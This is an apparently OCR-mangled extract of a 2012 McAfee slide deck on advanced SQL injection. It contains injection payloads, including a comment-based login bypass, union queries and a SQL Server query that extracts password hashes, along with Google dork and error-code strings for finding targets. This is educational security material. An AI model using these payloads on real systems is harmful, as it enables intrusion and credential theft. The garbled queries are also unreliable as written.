1 Advanced SQL Injection December 2012 Guillaume Loizeau Regional Sales Manager, DB Security McAfeeĢ Agenda What is SQL Injection In-band Injection Out-of-band Injection Blind Injection Advanced techniques Infection Privilege elevation Escape the DB to OS Protection against SQL Injectionģ Introduction SQL injection hacks in recent years: Heartland Payment Systems (2008) 132M credit cards Rock You (2009) 32M accounts Sony (2011) PBS (2011) Yahoo (2012) 500K login stolen Wurm Online 53 universities hacked (2012)Ĥ SQL Injection - Definition Une injection SQL est un type d'exploitation d'une faille de sécurité d'une application interagissant avec une base de données, en injectant une requête SQL non prévue par le système et pouvant compromettre sa sécurité.ĥ Simple SQL Injection $name = «stuart» and $password = «stuart» SELECT ID FROM user WHERE name = $name' AND password = $passwd' Password Validation and access to account ID Query executed SELECT ID FROM Users WHERE name = stuart AND password = stuart $name = «stuart» and $password = «it_does _not_matter» SELECT ID FROM Users WHERE name = stuart ' - ' AND password = it_does _not_matter' No Password evaluation in the query and access to account ID Query executed SELECT ID FROM Users WHERE name = stuart' Ħ Identifying SQL Injection - Web Find a target via Google ("Google dorks") Ociparse, ociexecute, OCIStmtExecute ORA-01756, 907, 933, 917, 900, 903, 906, 923, 970, 1742, 1789 inurl:/pls/portal30 Unclosed quotation mark Invalid column Conversion errors used for data retrieval 0 / 0 / user Web application security scanner (Acunetix, Pangolin, SQLMap) Manually Pass in 'Ĩ Different DB Techniques Oracle makes hacker s life harder No stacked queries Unless you get lucky and inject into a PL/SQL block Possible on SQL Server select * from where EmployeeID = 1 = N'select user, password from sys.syslogins where password is not nullĩ Different DB Techniques Oracle makes hacker s life harder Native error messages are hard to control Better error messages on SQL Server select * from users where username = '' having 1=1 - and password = '' Msg 8120, Level 16, State 1, Line 1 Column 'ername' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY Clause.ġ0 Different DB Techniques Oracle makes hacker s life harder No easy way to escape DB to OS (no xp_cmdshell) No easy way to do time-based blind SQL Injection (more later) Very limited in what you can do from an injection point On the other hand Large attack surface Many vulnerabilitiesġ1 In-band SQL Injection - Unions Select * from employees where dept_id = 1 union select something interesting that has the same number of columns Finding the number of columns by Adding nulls Adding order by # Id dept Loc Inv Qty Cost US Demo US EU Name Acct State pass hint date Smith 9234 CA secret asdf Jones 8836 MA qwe Doe 1521 NY iloveu lkd ġ2 SQL Injection In-band using SQL Server select * from where EmployeeID = 1 select name, password from sys.syslogins where password is not null adventure-works\guy1 16 Production Technician - WC :00: M M :00: AAE1D04A-C B4D :00: sa 虀 뛎 醜 ߨᦉל 㾋 㴼 绳 3 test ꍮᒬ 쵌ߨ 藌 街 Ḷ왏 컕 Now, just attack the password hash using either using brute-force or dictionary.
0 kommentar(er)
